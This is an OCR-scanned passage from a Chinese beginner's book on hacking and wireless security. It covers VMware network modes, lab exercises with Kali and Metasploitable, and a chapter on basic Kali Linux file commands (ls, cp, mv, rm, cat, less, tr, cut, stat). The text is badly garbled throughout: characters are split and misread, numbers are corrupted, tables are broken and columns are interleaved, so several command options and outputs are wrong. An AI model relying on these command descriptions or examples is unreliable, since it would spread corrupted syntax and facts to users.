口外 里 4 回 总 由 扩 接 (0) 
己 语 茹 (SCSI) 80 GB 


wy Cn/DVD (IDE) 


正在 体 用 辫 件 D:\Program Ples ,,， 网 站 过 搞 
NAT 站 机 按 村 式 (8]; 百 按 广 按 物 畦 网 络 
县 制 物理 网 癌 庄 控 扰 访 (P) 

加 NAT 六 式 ({N); 用 于 共享 主机 的 全 地 址 
避 民主 机 本 式 (H7 与 主机 共享 名 二 用 同 阁 
中 自 定居 (UU); 村 定 针 民风 乡 

VMnat0 (生动 桥接) 
CLAN 区 段 (LN 


LAN 区 段 (5)…， 高 级 {V).…. 


添加 (A)… Ps(R) 


[这 |] 了 柄 站 动 


3 种 网 络 连接 方式 介绍 如 下 : 
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搭建 无 线 测试 系统 Kali Linux 寺村 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) 桥接 模式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 可 以 获取 独立 的 王 地 址 ， 通 过 独立 
IP 地 址 进行 上 网 。 

(2) NAT 模 式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 将 与 主机 公用 一 个 全 地址， 通过 主 
机 IP 地 址 实现 NAT 转换 上 网 。 

(3) 仅 主机 模式 。 如 果 选 择 该 连接 模 
式 ， 虚 拟 机 仅 同 主机 进行 通信 ， 不 能 接 入 
Intenet 外 网 。 
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3.6 “小 试 身 手 


练习 1: 下 载 并 安装 虚拟 机 软件 。 

练习 2: 下 载 并 安装 Kali 虚 拟 机 ， 同 时 
更 新 Kali 虚 拟 机 到 最 新 。 

练习 3: 配置 CDliunx 虚 拟 机 ， 并 运行 
CDliunx 进 入 桌面 。 

练习 4: 安装 并 运行 Metasploitable 革 机 
系统 。 


第 4 重 


郊 赤 无线 网络 安全 测试 平 


台 一 -一 Kali Linux 系 统 的 基本 操作 


大 多 数 无 线 黑客 都 会 选择 Kali Linux 作 为 测试 平台 


， 这 是 因为 大 部 分 无 线 黑客 工具 都 


是 基于 Kali Linux 系 统 环境 下 的 。 本 和 草 介绍 Kali Linux 操 作 系 统 的 基本 操作 ， 主 要 包括 Kali 


Linux 系 统 下 的 命令 格式 、 
令 、 文 本 搜索 操作 命令 等 


4.1 Kali Linux 系 统 下 的 命令 
格式 


Kali Linux 命 令 格 式 同 DOS 命 令 格 式 类 
似 ， 不 过 Kali Linux 命 令 是 区 分 大 小 写 的 ， 这 
一 点 需要 注意 。Kali Linux 命 令 格 式 如 下 : 


命令 [- 选 项 ] [参数 ] 

例如 : 

La La ee 

该 命令 行 中 使 用 了 ls 命令 ， 并 且 选 用 


了 -l 选 项 与 -a 选项 ， 多 个 选项 写 在 一 起 ， 后 
np 得 到 一 个 完 
整 的 命令 

i 在 使 用 Kali Linux 命 令 时 ， 需 要 
注意 以 下 事项 : 

(1) 有 一 些 个 别 命令 的 使 用 不 遵循 此 
格式 。 

(2) 当 有 多 个 选项 时 ， 可 以 写 在 一 起 。 


管理 文件 和 目录 命令 、 文 件 内 容 查看 命令 


、 权 限 分 配 操作 命 


(3) 简化 选项 与 完整 选 
等 于 -all。 

(4) 存在 不 加 选项 单独 执行 的 命令 。 
例如 : cd /etc， 使 用 了 cd 命令 ， 并 没有 加 
入 选项 ， 此 时 /etc 依然 作为 参数 使 用 ， 得 到 
一 个 完整 命令 。 还 有 top， 使 用 top 命令 ， 
并 没有 选取 任何 选项 以 及 参数 ， 但 即使 这 
样 它 依然 是 一 条 完整 的 命令 。 

由 此 可 以 看 出 Kali Linux 的 命令 可 以 
选择 加 入 一 些 选项 及 参数 ， 也 可 以 独立 运 
行 ， 取 决 于 实际 选择 的 命令 。 


管理 文件 和 目录 命令 


Rr 目录 的 命令 是 Kali Linux 系 
统 中 第 用 的 一 些 命 令 ， 营 握 这 些 命令 的 使 
用 方法 ， 可 以 帮助 用 户 提 高 使 用 Kali Linux 
操作 系统 的 能 力 。Kali Linux 管 理 文件 和 目 
录 的 命令 见 下 表 。 


项 。 例 如 : 


4.2 


表 Kali Linux 管 理 文 件 和 目录 的 命令 


4.2.1 ls 
ls 命令 用 来 查看 目录 的 内 容 。i 


创建 一 个 新 的 目录 


列 出 目录 
复制 文件 或 目录 


删除 一 个 空 的 目录 


至 法 格式 如 下 : 


二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


1s 选 项 [-ald] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


选 项 含 义 
-a 显示 目录 中 的 全 部 文件 ， 包 括 隐藏 文件 
-| 显示 目录 中 的 细节 ， 包 括 权 限 、 所 有 者 、 组 群 、 大 小 、 创 建 日 期 、 文 件 是 否 是 链接 等 
-I 从 后 同 前 依次 列 出 目录 中 内 容 
-t 将 文件 依 建立 时 间 的 先后 次 序列 出 
-f 显示 列 出 文件 的 文件 类 型 
-S 按照 文件 的 大 小 排序 文件 
-R 该 选项 以 递归 方式 列 出 当前 目录 下 所 有 子 目录 内 的 内 容 
-h 以 可 读 的 方式 显示 文件 的 大 小 ， 如 用 KK、M、G 作 单位 


例如 : 使 用 ls -al 命令 ， 来 显示 目录 中 例如 : 使 用 mkdir -p 创 建 一 个 名 称 为 
全 部 文件 的 详细 信息 ， 下 图 为 执行 效果 ， ”test/001 test/002 的 递归 目录 ， 这 里 输入 的 创 
这 里 截取 了 部 分 文件 信息 ， 其 中 ， 左 侧 显 ” 建 命令 如 下 : 
未 的 是 目录 或 文件 的 权限 信息 ， 第 一 个 root mkdir -p test/001 test/002 
是 文件 的 所 有 者 信息 ， 第 二 个 root 是 文件 的 机 | 3 hh 人 
所 有 者 所 在 的 所 性 ED 


Foot@kali:-# [Us -Ba root@kali:~# ls 

总 用 和 量 394 Desktop Downloads  _ Pictures Templates Test 
drwxr-xr-x 29 root root 4096 10 有 月 29 22:13 . 

Urwxr-xr-x 26 root root 36864 19 月 27 21:39 .. 

Frw=-----= 1 root root 39728 16 月 36 63:65 .bash history 


Documents MUS1IC Public test Videog 
root@kali:-~# ls test 


-rw-r--r-- 1 root root 3391 7 月 31 94:18 .bashrc 9691 0992 
drwxr-xr-x 2 root root 4996 19 有 日 29 91:39 .bully 

drwx------ 17 root root 4096 19 月 29 94:;35 .cache 

drwxr-xr-x 3 root root 4996 19 月 22 090:58 .chirp 是 
Hrwxr-xr-x 22 root root 4D96 16 月 29 967:57 .config 4.2.3 rmdir 


drwxr-xr-x 5 root root 4996 16 月 10 92:59 .designer 
Hrwxr-xr-x 3 root root 4996 19 月 8 94:37 Desktop 


drwxr-xr-x 2 root root 4096 8 月 21 97:95 Documents 人 
drwxr-xr-x 5 root root 4096 10 36 01:9@ Downloads rmdir 用 ] 删 除 3 日 录 o 命 re 格式 


drwx------ 3 root root 4090 6 月 21 07:905 .gnupg 
如 | 二 


a 4.2.2 mkdir rmdir [目录 名 ] 


; mkdir 命 令 用 来 建立 目录 ， 目 录 名 称 需 例如 : 这 里 删除 一 个 名 称 为 001 空 目 
要 使 用 参数 给 定 。 语 法 格式 如 下 : 录 ， 这 里 输入 的 删除 空 目 录 命 令 如 下 : 


mkdir -pP [目录 名 ] rmdir 001 


其 中 ， 参 数 -p 表 示 递 归 创 建 目 录 。 按 Enter 键 ， 下 图 为 执行 效果 。 
例如 : 使 用 mkdir 命 令 创 建 一 个 名 称 为 root@kali: ~# cd test ] 
temp 的 目录 ， 输 入 的 创建 命令 如 下 : ei 


root@kali:~/test# rmdir 001 
mkdir temp root@kali:~/test# ls 


p02 
按 Enter 键 ， 下 图 为 执行 效果 。 
Foot@kali:-# ts ] 4.2.4 cd 


F Documents Music Public Test 
pesktop Downloads Pictures Templates Videos 


root@kali:-# mkdir temp CG d 命 今 用 十 切 换 = 六 其 可 作 日 录 至 


root@kali:-~# ls 


r Documents Music Public Templates Videog dirName (目录 参数 ) 其 中 dirName 表 示 


Desktop Downloads Pictures temp Test 


40 


第 4 章 ”熟悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 SEE 


法 可 为 绝对 路 径 或 相对 路 径 。 知 目录 名 称 目录， 该 命令 比较 简单 也 没有 选项 ， 下 图 


省 略 ， 则 变换 至 使 用 者 的 home 目 录 ， 也 就 ”为 运行 命令 后 的 显示 结果 。 
是 刚 登录 时 所 在 的 目录 。 命令 格式 如 下 : hotest Pictures Templates Test 
a [目录 ] Ee Public test Videos 
/root 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”cd 命令 参数 介绍 侈 提示: 为 了 区 分 目 录 信 息 心 > ， 可 以 先 使 用 1]s 
2 出 目 一 信息 Ar Oo 
选 项 含 义 FE 
~ 示 为 h 
表示 为 home 目 录 4276 cp 
表示 目前 所 在 的 目录 A 
| 
| 二 时 要 切换 到 的 目标 日 录 是 一 个 符号 链 “出 法 格式 如 下 ; 
了 | 接 ， 直 接 切换 到 符号 链接 指向 的 目标 目录 cp -rp [原文 件 或 目录 ] [目标 目录 ] 
如 果 要 切换 的 目标 目录 是 一 个 符号 的 链 命令 中 选项 的 参数 介绍 见 下 表 。 
工 | 接 ， 直 接 切换 到 字符 链接 名 代表 的 目录 ， ore 
而 非 符号 链接 所 指向 的 目标 目录 Cp 命令 参数 介绍 
当 仅 使 用 “-” 一 个 选项 时 ， 当 前 工作 目 。 选项 a 


- 录 将 被 切换 到 环境 变量 OLDPWD 所 表示 的 


和 此 选项 通常 在 复制 目录 时 使 用 ， 它 保留 


-a 链接 、 文 件 属性 ， 并 复制 目录 下 的 所 有 


使 用 cd 加 上 目录 名 称 可 以 切换 到 相应 
的 目录 ， 例 如 : 使 用 cd ~ 可 以 切换 到 当前 用 


户 的 主 目录 ， 如 下 图 所 示 。 “| 于 windows 系 统 中 的 快捷 方式 
ee -f “| 覆盖 已 经 存在 的 目标 文件 而 不 给 出 提示 
A 
soteket sg 与 -选项 相反 ， 在 覆盖 目标 文件 之 前 给 出 
me 4 提示 ， 要 求 用 户 确认 是 否 覆盖 ， 回 答 y 时 
如 果 使 用 cd 加 上 绝对 路 径 可 以 直接 切 目标 文件 将 被 覆盖 
| A [14 四 3»9 2 yy 
ee 目录 ， 每 加 入 “..” 可 以 退出 除 复制 文件 的 内 容 外 ， 还 把 修改 时 间 和 
层 ， 如 下 图 所 示 。 卫 | 访问 权限 也 复制 到 新 文件 中 
oot@kali:/# cd /usr/share/john 
tho reo Tol eel cd a 车 给 出 的 源 文件 是 一 个 目录 文件 ， 此 时 
| 将 复制 该 目录 下 所 有 的 子 目 录 和 文件 
4.2.2 pwd J “| 不 复制 文件 ， 只 是 生成 链接 文件 
pwd 命 令 以 绝对 路 径 的 方式 显示 用 户 当 人 
前 工作 目录 。 命令 将 当前 目录 的 全 路 径 名 Naren vie et 页 复制 目录 到 
称 〈 从 根 目录 ) 写 入 标准 输出 。 全 部 目录 we 
使 用 “人 ”分隔 。 第 一 个 /和 表示 很 目录， 最 后 | 
一 个 目录 是 当前 目录 执行 psd 全 令 可 立刻 让 
获取 当前 用 户 所 在 的 工作 目录 的 绝对 路 径 
名 称 。 命 令 格式 如 下 : 例如 : 使 用 cp 命令 ， 复 制 文件 到 目 


pwd 


例如 : 使 用 pwd 命 令 ， 可 以 显示 出 当前 


内 容 。 其 作用 等 于 dpR 选 项 组 合 
复制 时 保留 链接 。 这 里 所 说 的 链接 相当 


录 ， 下 图 为 执行 效果 。 


47 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


root@kali:~# touch 0601.txt 
root@kali:-~# 1s 


2 er emp 
BOl.txt Documents Music Public Templates Videos 
root@kali:-~# cp 001.txt temp 

root@kali:;-~# ls temp 

DOl.txt Test 


mv 命令 用 来 对 文件 或 目录 重新 命名 ， 


”或 者 将 文件 从 一 个 目录 移 到 另 一 个 目录 


中 。source 表 示 源 文件 或 目录 ，target 表 示 目 
标 文 件 或 目录 。 如 果 将 一 个 文件 移 到 一 个 
己 经 存在 的 目标 文件 中 ， 则 目标 文件 的 内 
容 将 被 覆盖 。 命 令 语法 格式 如 下 : 

mv[ 原 文件 或 目录 ] [目标 目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 
表 mv 命令 参数 介绍 

选 项 


含 义 
，。 | 着 指定 目录 已 有 同名 文件 ， 则 先 询问 是 
否 覆盖 旧 文件 
。 | 在 mv 操作 要 禾 盖 某 已 有 的 目标 文件 时 不 
给 任何 指示 
使 用 mv 命令 将 源 文件 被 移 至 目标 文件 
有 以 下 两 种 不 同 的 结果 : 


e 如 果 目 标 文 件 是 到 茶 一 目录 文件 的 
路 径 ， 源 文件 会 被 移 到 此 目录 下 ， 
且 文 件 名 不 变 。 如 有 条 目标 文件 不 是 
目录 文件 ， 则 源 文件 名 《只 能 有 一 
个 ) 会 变 为 此 目标 文件 名 ， 并 罗 兰 
己 经 存在 的 同名 文件 。 

e 如 果 源 文件 和 目标 文件 在 同一 个 目 
录 下 ，mv 的 作用 就 是 改 文件 名 。 妆 
目标 文件 是 目录 文件 时 ， 源 文件 或 
目录 参数 可 以 有 多 个 ， 则 所 有 的 源 
文件 都 会 被 移 至 目标 文件 中 。 所 有 
移 到 该 目录 下 的 文件 都 将 保留 以 前 
的 文件 名 。 


人 注意 : mv 命令 与 cp 命令 的 执行 效果 不 


同 ，mv 的 作用 是 剪 切 ， 文 件 个 数 并 未 增 
加 。 了 而 cp 对 文件 进行 复制 ， 文 件 个 数 增 
加 了 。 


例如 : 首先 查看 两 个 目录 ， 然 后 使 用 
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mv 命令 ， 将 其 中 一 个 目录 剪 切 走 ， 下 图 为 
YY 一 /一 

运行 效果 。 

root@kali:~# ls test 

002 

root@kali:~# ls Test 

2 3 4 port Service test 
root@kali:-# mv test/002 Test 
root@kali:-# ls Test 

002 2 3 4 port Service test 
root@kali:~# ls test 

root@kali:~# 


例如 : 使 用 mv 命令 对 文件 进行 重合 
名 ， 下 图 为 执行 效果 。 


root@kali:~/temp# LS 

B61.tXxt Test 

root@kali:~/temp# mv 90900901.txt 9002.txXxt 
root@kali:~/temp# ls 

8692 .Txt Test 


4.2.8 rm 
rm 命令 用 于 删除 一 个 文件 或 者 目录 。 
命令 语法 格式 如 下 : 
rm -f [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 rm 命令 参数 介绍 


选 项 


-1 
-f 


I 


含 义 
删除 前 逐一 询问 确认 
即使 源 文件 为 只 读 属性 ， 也 直接 删除 ， 
不 确认 
将 目录 及 以 下 文件 递归 删除 


例如 : 使 用 mm 命令 加 上 -i 选 项 ， 在 删除 
文件 时 会 进行 询问 ， 下 图 为 执行 效果 。 
root@kali:~/temp# touch 001.txt 
root@kali:~/temp# ls 
e901l1.txt Test 
root@kali:~/temp# rm -i O01.txt 
rm: 是 否 删 除 普 通 空 文件 '9691.txt'? y 
root@kali:~/temp# LS 
Test 


例如 : 如 果 使 用 rm 命令 -r 选 项 会 递归 
删除 ， 该 命令 初学 者 使 用 时 需要 慎重 ， 人 否 
则 可 能 误 删 除 比较 重要 的 文件 导致 系统 裔 
演 ， 下 图 为 递归 删除 目录 的 执行 效果 。 


root@kali:~# mv Test/002 test 
root@kali:~# rm test 

rm: 无 法 删除 'test': 是 一 个 目录 
root@kali:~# rm -r test 
root@kali:~# ls 

Desktop Documents Downloads Music Pictures 
Public Templates Test Videos 
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4.3 文件 内 容 查看 命令 


文件 内 容 查 看 命令 可 以 方便 对 文件 内 
容 进行 查看 ，Kali Linux 给 出 了 丰富 的 文件 
查看 命令 ， 通 过 这 些 命令 可 以 快速 地 查看 
想 要 的 文件 信息 。Kali Linux 中 文件 内 容 查 
看 命令 见 下 表 。 
表 ”Kali Linux 中 文件 查看 命令 


命 令 功 能 
cat 由 第 一 行 开 始 显 示 文 件 内 容 
tac 从 最 后 一 行 开 始 显示 ， 与 cat 功 能 相反 
nl 显示 内 容 时 ， 输 出 内 容 的 行 号 
more 一 页 一 页 地 显示 文件 内 容 
head 只 看 头 几 行 
tail 只 看 末尾 几 行 
less 与 more 类 似 ， 但 可 以 往 前 翻 页 
4.3.1 cat 


cat 命 令 用 于 连接 文件 并 打印 到 标准 输 
出 设备 上 ，Kali Linux 系 统 中 有 多 个 用 于 查 
看 文本 内 容 的 命令 ， 每 个 命令 都 有 上 自己 的 特 
点 ， 例 如 : 这 个 cat 命 令 就 是 用 于 查看 内 容 
较 少 的 纯 文 本 文件 的 。 命 令 语法 格式 如 下 : 

cat [-RAbEnTv] [文件 名 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 cat 命令 参数 介绍 


选 项 含 义 

二 相当 于 -VET 的 整合 选项 ， 可 列 出 一 些 特 
殊 字 符 而 不 是 空白 而 已 

旺 列 出 行 号 ， 仅 针对 非 空 白 行 作 行 号 显 
示 ， 空 白 行 不 标 行 号 

-E 将 结尾 的 断 行 字 节 $ 显 示 出 来 

列 印 出 行 号 ， 连 同 空白 行 也 会 有 行 号 ， 
与 -b 的 选项 不 同 

-T 将 Tab 按 键 以 各 显示 出 来 

-V 列 出 一 些 看 不 出 来 的 特殊 字符 


这 个 命令 比较 简单 用 于 显示 内 容 ， 加 
入 -n 选 项 可 以 实现 市 行 号 输出 ， 右 上 图 为 运 
行 实例 。 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ER 


root@kali:~# cat -n /etc/issue 
1 Kali GNU/Linux Rolling \n ANL 
2 

root@kali:-~# cat /etc/issue 

Kali GNU/Linux Rolling \n \| 


4.3.2 tac ee 


tac 与 cat 命 令 刚好 相反 ， 文 件 内 容 从 误 闭 妆 
最 后 一 行 开 始 显示 ， 可 以 看 出 tac 是 cat 的 
倒 着 写 。 


tac [-AbEnTv] [文件 名 ] 


为 了 对 比 tac 与 cat 命 令 的 区 别 ， 这 里 使 
用 tac 命 令 查 看 与 cat 命 令 一 样 的 文件 ， 下 图 为 
执行 效果 ， 可 以 看 到 cat 显 示 一 行文 本 一 行 空 
白 ，tac 先 显示 一 行 空白 再 显示 文本 。 


root@kali:~# cat /etc/issue 
Kali GNU/Linux Rolling \n ANAL 


root@kali:~# tac /etc/issue 


Kali GNU/Linux Rolling \n \\ 


4.3.3 more 


如 下 : 


more [-dlfpcsu] [-num] [+/pattern] 


[+linenum] [文件 名 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 more 命 令 参 数 介 绍 


选 项 含 刀 
+n 从 第 n 行 开始 显示 
-nh 定义 屏幕 大 小 为 n 行 
在 每 个 档案 显示 前 搜寻 该 字 串 (pat- 
+/pattern i Se 二 
tem) ， 然 后 从 该 字 串 前 两 行 之 后 开始 显示 
二 从 顶部 清 屏 ， 然 后 显示 
4 提示 按 空 格 键 继续 ， 按 Q 刍 退出， 禁用 啊 
铃 功能 
可 忽略 Ctrl+L ( 换 页 ) 字符 
通过 清除 窗口 而 不 是 滚屏 来 对 文件 进行 换 
” 页 ， 与 -c 选 项 相似 
浇 把 连续 的 多 个 空 行 显示 为 一 行 
-U 把 文件 内 容 中 的 下 男 线 去 掉 
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例如 : 使 用 more 命 令 查 看 文本 全 部 内 表 less 命 令 参 数 介绍 
容 ， 下 图 为 执行 效果 。 沈 项 pa 


FR Network services, Internet stytle 
括 


ER Note that it is presently the policy of IANA to assign a single well-known 
皮 port number for both TCP and UDP; hence, officially ports have two entries 
RR even if the protocol doesn't support UDP operations. 

# 
RR Updated from http://www.iana.org/assignments/port-numbers and other 

RE sources like http://www.freebsd.org/cgi/cvsweb.cyi/src/etc/services . 

EE New ports will be added on request if they have been officially assigned 
EE by IANA and used in the real-world or are Needed by a debian package. 

# If you need a huge list of used numbers please install the nmap package. 


上 CPpmUX l/tcp # TCP port service multiplexer 
echo 7/tcp 
echo 7/udp 
discard 9/tcp sink null 
discard 9/udp sink null 
systat 11/tcp Users 
daytime 13/tcp 
Haytime 13/udp 
netstat 15/tcp 
qotd 17/tcp quote 
# message send protocol 


msp 18/tcp 


一 般 情 况 下 ， 一 页 并 不 能 显示 文本 
的 全 部 内 容 ， 这 时 就 可 以 使 用 下 面 的 按键 
来 查看 未 显示 的 内 容 ， 常 用 的 按键 说 明 见 
下 守 ” 


表 常用 的 按键 说 明 
按键 功 能 
空白 键 (space) | 代表 向 下 翻 一 页 
Enter 代表 向 下 翻 一 行 


代表 在 这 个 显示 的 内 容 当 中 ， 同 下 


人 搜寻 “ 字 串 ”这 个 关键 字 


立刻 显示 出 文件 名 以 及 目前 显示 的 
行 数 


Ctrl+F 向 下 滚动 一 屏 

输出 当前 行 的 行 号 

V 调用 vi 编辑 器 

! 命 令 调用 Shell， 并 执行 命令 


Q 退出 more， 不 再 显示 该 文件 内 容 


less 与 more 类 似 ， 但 使 用 less 可 以 随意 


”浏览 文件 ， 而 more 仅 能 向 前 移动 ， 却 不 能 


器 后 移动 ， 而 且 less 在 查看 之 前 不 会 加 载 整 
个 文件 。 命 令 语法 格式 如 下 : 

licss °° IRF 

命令 中 选项 的 参数 介绍 见 右 表 。 
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-b < 缓冲 区 大 小 > 


-© 


汪 


-2 
-i 
-mm 


-N 


u 

3 

空格 键 
Enter 键 
PageDown 


PageUp 


例如 : 使 用 less 查 看 文本 内 容 ， 
执行 效果 。 


设置 缓冲 区 的 大 小 
当 文 件 显 示 结 束 后 ， 目 动 离开 


强迫 打开 特殊 文件 ， 例 如 外 围 设 
备 代号 、 目 录 和 二 进 制 文件 


只 标志 最 后 搜索 的 关键 词 
忽略 搜索 时 的 大 小 写 

显示 类 似 more 命 令 的 百分比 
显示 每 行 的 行 号 


将 less 输 出 的 内 容 在 指定 文件 中 保 
存 起 来 


不 使 用 警告 音 
显示 连续 空 行为 一 行 

行 过 长 时 间 将 超出 部 分 舍弃 
将 tab 键 显示 为 规定 的 数字 空格 
向 下 搜索 “字符 串 ” 的 功能 
加 上 搜索 “字符 串 ” 的 功能 
重复 前 一 个 搜索 

反 回 重复 前 一 个 搜索 
回 后 翻 一 页 

加 后 翻 半 页 

显示 帮助 界面 

退出 less 命 令 

回 前 滚动 半 页 

回 前 滚动 一 行 

滚动 一 页 

滚动 一 行 

加 下 翻动 一 页 

加 上 翻动 一 页 


下 图 为 
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Ecpm I7tcp # TCP port service muttiptlexen 
echo 7/tcp 
Echo 7/udp 
Hiscard 9/tcp sink null 
Hiscard 9/udp sink null 
Bystat ll/tcp Users 
Haytime 13/tcp 
Haytime 13/Udp 
etstat l15/tcp 
hotd l17/tcp quote 
msp l8/tcp # Message send protocol 
sp 18/Vudp 
chargen l9/tcp ttytst source 
charge l19/udp ttytst source 
ftp-dat 28/tcp 
ftp 21/tcp 
fsp 21/udp fspd 
h 22/tcp # SSH Remote Login Protocol 
kelnet 23/tcp 
smtp 25/tcp mail 
Kime 37/tcp tims 


4.3.5 head 


head 命 令 用 于 查看 纯 文本 文档 的 前 n 
行 ， 命 令 语法 格式 如 下 : 
[文件 名 ] 
命令 中 选项 的 参数 为 -n， 用 于 指定 


head 


行 数 。 
使 用 该 命令 可 以 设 定 显 示 部 分 内 容 ， 
内 容 从 头 开始 -n 选 项 指定 截止 行 数 ， 例 如 : 
查看 一 个 文本 的 前 5 行 ， 运 行 head 命 令 ， 下 
图 为 执行 效果 。 


rootakali:~# head -n 5 Jetc/services 
# Network services, Internet style 


# Note that it is presently zhe policy of IANA to assign a single well-known 
上 port number for both TCP and UDP; hence, officially ports have two entries 
由 even i he protocol doe ns. 


n't support UDP operatio 


4.3.6 talil 


tail 命 令 用 于 查看 文本 末尾 内 容 ， 与 
head 命 令 正 好 相反 ， 命 令 语法 格式 如 下 : 
[文件 名 ] 

命令 中 选项 的 参数 为 -n 与 -f， 其 中 -n 用 
于 指定 行 数 ，-f 动 态 显 示 文 件 末 尾 内 容 。 

taill 命 令 多 用 于 查看 日 志文 件 ， 因 为 日 
志文 件 是 变动 的 且 日 志 都 依次 从 尾部 加 入 ， 
例如 : 运行 tail -n 5 /etc/services 命 令 来 查看 文 
件 末 尾 内 容 ， 下 图 为 执行 效果 。 


七 己 


Iroot@kali:~# tail -n 5 /etc/services 
dircproxy 570090/tcp # Detachzble IRC Proxy 
fido 690177/tcp # fidonet EMSI over telned 
ido 69179/tcp # fidonet EMSI over TCP 
Local services 


其 他 文件 操作 命令 


除了 查看 文件 内 容 命 令 外 ，Kali Linux 
还 提供 了 一 些 其 他 的 文件 操作 命令 ， 使 用 


4.4 
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这 些 命令 可 以 过 滤 转 化 文本 中 的 字符 。Kali 
Linux 中 其 他 文件 操作 命令 见 下 表 。 
表 Kali Linux 中 其 他 文件 操作 命令 


命 令 功 能 

tr 转换 或 删除 文件 中 的 字符 

Wc 统计 文本 的 行 数 、 字 数 、 字 节 数 等 
di 在 比较 文件 的 差异 

file 查看 文件 类 型 

cut 截取 文本 中 想 要 的 内 容 

stat 查看 文件 的 存储 信息 和 时 间 等 信息 
dd 读 取 、 转 换 并 输出 数据 


44.1 tr 


Kali Linux 系 统 中 的 tr 命令 用 于 转换 或 光电 
删除 文件 中 的 字符 ，tr 指 令 从 标准 输入 设备 
读 取 数 据 ， 经 过 字符 串 转译 后 ， 将 结果 输 
出 到 标准 输出 设备 。 命 令 语法 格式 如 下 : 


tr [-cdst][--help][--version] [第 一 字 
符 集 ] [第 二 字符 集 ] 


tr [OPTION]-™SETI [SET2] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 tr 命令 参数 介绍 


选 项 含 义 

-C 反选 设 定 的 字符 

-d 删除 指令 字符 

-S 缩减 连续 重复 的 字符 成 指定 的 单个 字符 

是 削减 SET1 指 定 范围 ， 使 之 与 SET2 设 定 
长 度 相等 

--help 显示 程序 用 法 信息 

--version 显示 程序 本 号 的 版 本 信息 


有 时 想 要 快速 地 蔡 换 文本 中 的 一 些 词 
汇 ， 又 或 者 把 整个 文本 内 容 都 进行 蔡 换 ， 
如 果 进 行 手 工 蔡 换 工作 量 太 大 。 这 时 就 可 
以 先 使 用 cat 命 令 读 取 符 处 理 的 文本 ， 然 后 
通过 管道 待 “|”， 把 这 些 文本 内 容 传递 给 fr 
命令 ， 最 后 进行 葵 换 操作 即 可 。 

例如 : 使 用 tr 对 文本 内 容 进行 大 小 写 转 
换 ， 下 图 为 命令 执行 效果 。 
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root@kali:~/temp# Vi 001.txt 
root@kali:~/temp# cat Q01.txt 

hello linux 

root@kali:~/temp# cat 901.txt | tr a-z A-Z 


式 如 下 : 
wc [-clw] [--help] [--version] [文件 ...] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 trs 命 令 参 数 介 绍 


选 项 含 义 
只 显示 Bytes 数 
-1 只 显示 行 数 
-W 只 显示 字数 


例如 : 使 用 wc 命令 但 看 文本 中 的 行 数 
字数 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat 001.txt | wc -d 
12 
root@kali:~/temp# cat O01.txt |wc -\ 


1 
root@kali:~/temp# cat O01.txt |wc -w 
2 


大 轴 取出 最 想 要 的 数据 ， 这 也 是 用 户 应 该 重点 


en 


ev RAY 、 6 ZX 一 99 
光学 习 的 内 容 。 一 般 情况 下 ， 按 基于 “ 行 


的 方式 来 提取 数据 是 比较 简单 的 ， 只 要 
设置 好 要 搜索 的 关键 词 即 可 。 但 是 如 有 果 按 
“ 列 ” 搜 索 文本 ,不仅 要 使 用 -f 选 项 来 设 
置 需要 看 的 列 数 ， 还 需要 使 用 -d 选 项 来 设 
置 间 隐 符号。 不过， 使 用 cut 命 令 则 可 以 快 
速 截取 文本 中 想 要 的 内 容 。 命 令 语法 格式 
如 下 : 
CE TREE 


cut [-c] [filel] 
cut [-df] [filel] 


命令 中 选项 的 参数 介绍 见 下 表 。 
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表 trs 命 令 参数 介绍 


选 项 含义 
-b 以 字 节 为 单位 进行 分 割 
< 以 字符 为 单位 进行 分 割 
-d 和 目 定 义 分 隅 待 ， 默 认为 制 表 符 
f 与 -4 一 起 使 用 ， 指 定 显 示 哪 个 区 域 
-0 取消 分 割 多 字 节 字符 


网 提示 : cut 命 令 从 文件 的 每 一 行 剪 切 字 
刷 、 字 符 和 字段 并 将 这 些 字 节 、 字 符 和 字 
段 写 至 标准 输出 。 如 果 不 指 定 文件 参数 ， 
cut 命 令 将 读 取 标准 输 和 入， 不过， 必须 指 
定 -b、-c 或 -f 标 志 之 一 。 


例如 : 使 用 cut 截 取 部 分 内 容 进行 显 
示 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat 001.txt 
601:xiaoming:75:30:55:60 
002:zhangsan:80:90:100:88 
root@kali:~/temp# cut -d":" 
xiaoming 

zhangsan 


例如 : 使 用 cat 读 取 文 件 再 使 用 cut 进 行 
截取 某 段 内 容 ， 下 图 为 命令 执行 效果 。 


ee cat 091.txt 
6001:xiaoming:75:30:55:60 
002:zhangsan:80:90:100:88 
root@kali:~/temp# cat O01.txt | cut -d":" 
75:30 

80:90 


-f2 881 .txt 


-f3,4 


4.4.4 stat 


Kali Linux 系 统 中 的 stat 命 令 可 以 用 于 查看 
文件 的 存储 信息 和 时 间 等 信息 ， 会 显示 出 文 
件 的 三 种 时 间 状 态 : 最 近 访 问 (Access) 、 
更 改 (Modify) 、 改 动 (Change) 。 命 令 
语法 格式 如 下 : 

stat [文件 或 目录 ] 


例如 : 使 用 stat 可 以 查看 文件 详细 时 
间 ， 下 图 为 命令 执行 效果 。 


Iroot@kali:~/temp# stat 661.txt 
| 文件 : 991.txt 


小 : 12 块 : 8 IO0 块 ; 4996 普通 文 件 
设备 ; 801h/2649d Inode : 3548922 不 链接 : 1 
巾 限 : (6644/-rw-r--r--) Uid: | root) Gid: ( 8/ root) 
最 近 访 问 : 2818-11-961 94:47:42.984539167 -84860 
最 近 于 改 : 2818-11-91 64:47:37.84B539246 -8499 
最 近 改 动 ;: 2818-11-91 94:47:37.848530246 -9460 
创建 时 间 : 
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4.4.5 diff 


